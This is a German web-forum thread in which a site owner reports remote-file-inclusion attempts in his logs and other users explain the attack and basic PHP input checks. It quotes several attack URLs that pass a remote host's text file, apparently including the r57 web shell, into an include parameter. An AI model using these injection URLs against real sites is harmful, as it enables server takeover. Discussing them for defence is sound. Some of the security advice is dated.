saibot

Hallo,

habe gerade in meiner Logfile was gefunden was ich irgendwie merkwürdig finde.

Mehrmals wurde meine Seite mit komischen Argumenten aufgerufen:

http://www. ... .de/index.php?site=http://n0ne.net/id.txt?

Die Variable site existiert ja wirklich auf meiner Seite. In der angegebenen Textfile befindet sich php-Code (hier).

Was würde dieser Code bewirken? Sieht doch sehr kryptisch aus

Wird der Inhalt solch einer Textdatei überhaupt in die Variable übernommen oder nur die Adresse?

Im Prinzip kann ja so jeder beliebige Code in mein PHP-Skript eingeschleust werden, vorausgesetzt ich überprüfe nicht alle Variablen vor der Verwendung auf Plausibilität.

Gibt es eine einfache Möglichkeit, sowas zu verhindern?

Mister Ad

Zergling-new

Blick da auch gerade nicht durch, sieht etwas sinnlos aus, kenn aber die Linux-Konsole nicht. Auf jeden Fall probiert er alles aus, was PHP an Funktionen hergibt, die direkt auf die Betriebssystem-Konsole zugreifen. Wahrscheinlich will er Infos über deinen Server sammeln um ihn dann später zu übernehmen.

Er spekuliert darauf, dass du $_GET["site"] direkt mit require/include öffnest, dann hätte er den PHP-Code bei dir eingeschleust.

Ein Grund mehr zu verschleiern, dass die serverseitige Skriptsprache PHP ist und jede vom Client manipulierbare Variable gegenzuchecken.

saibot

Hmm...ok, eine Variable ungeprüft als include einzubinden wäre auch etwas dämlich

Aber mal angenommen der Code würde im Klartext, halt in einer Zeile übergeben werden. D.h. meine Variable "site" hätte PHP-Code als Inhalt.

Würde es überhaupt eine Möglichkeit geben, dass der Code ausgeführt wird? Ich mein solang ich ihn als Argument an Funktionen z.B. zur Stringbearbeitung übergebe dürfte doch nichts passieren, oder?

Lediglich HTML-Code könnte bei der Ausgabe kritisch werden, oder MySQL-Operationen könnten missbraucht werden, aber wie PHP-Code ausgeführt werden sollte kann ich mir grad nicht vorstellen (ausser include oder require). Oder hab ich grad nen Blackout

Aber sowas würde doch auf jeden Fall Abhilfe schaffen oder?

Zergling-new

Ja, aber es klappt oft genug, sonst würde sich der Hacker nicht die Mühe machen.


PHP-Code wird nur bei include/require oder eval ausgeführt.
HTML-Code überall da, wo kein strip_tags(), htmlspecialchars() oder htmlentities() auf einen vom Client stammenden Input, der in die Website eingebunden wird, ausgeführt wurde.
Für MySQL-Werte verwendeter Input sollte mit mysql_real_escape_string() abgesichert werden und nicht nur mit addslashes().

Korrigiert mich, wenn ich eine Funktion oder Möglichkeit vergessen habe.
Natürlich ist Schadcodeausführung auch über PHP-Bugs möglich, darauf hat der Programmierer aber keinen Einfluß.

saibot

Hmm, sollte meine Logdatei öfter anschauen. Sowas ähnliches gabs schonmal vor paar wochen. Damals aber von ner Russischen seite aus (oder so...)

http://badmus.by.ru/id.txt?

Ist wohl ein Zeichen dafür dass meine Seite in Google gut dabei ist. Ansonsten wüsste ich nicht wie diese Leute gerade auf eine kleine unbedeutende private Homepage kommen

dr.e.

Hallo saibot,

wie Zergling schon sagte funktioniert das oft genug und die Jungs versuchen nicht einfach nur deine Seite zu übernehmen, sondern denen geht es um die Maschine. Da sind shared hosting-Server ein recht beliebtes Ziel. Ist die Maschine einmal in deren Gewalt wird diese so modifiziert, dass diese beispielsweise zu einem Bot-Netzwerk oder einem DOS-Netzwerk zusammengefasst werden.

__________________
Viele Grüße,
Dr.E.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Think about software design before you start to write code!
2. Discuss and review it together with experts!
3. Choose good tools (-> Adventure PHP Framework (APF))!
4. Write clean and reusable software only!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

saibot

Aha, so macht das ganze "Sinn". Naja..da bin ich doch mal froh dass ich mich nicht um den Server kümmern muss

robo47

Kommt gerade bei Anfängern oft genug vor und es gibt auch immer wieder Systeme die sowas aufgreifen. Hab auf meiner Seite sowas sehr regelmäßig mittlerweile in den Logs, obwohl sie in keinster form dynamische Parameter hat, das sind oftmals einfach nur Bots die alle möglichen seiten abklappern und es versuchen.

__________________
robo47.net - Blog, Codeschnipsel und mehr
| Caching-Klassen und Opcode Caches in php | Robo47 Components - PHP Library extending Zend Framework

saibot

Ja leider, der nächste war grad eben da: http://www.new-scam.com/r57.txt?

Der Code ist mächtig lang, hab ihn nicht ganz angeschaut, aber er verschickt u.a. Mails.

Darf man solche Links hier überhaupt rein stellen?

Zergling-new

lol der hat sogar nen copyright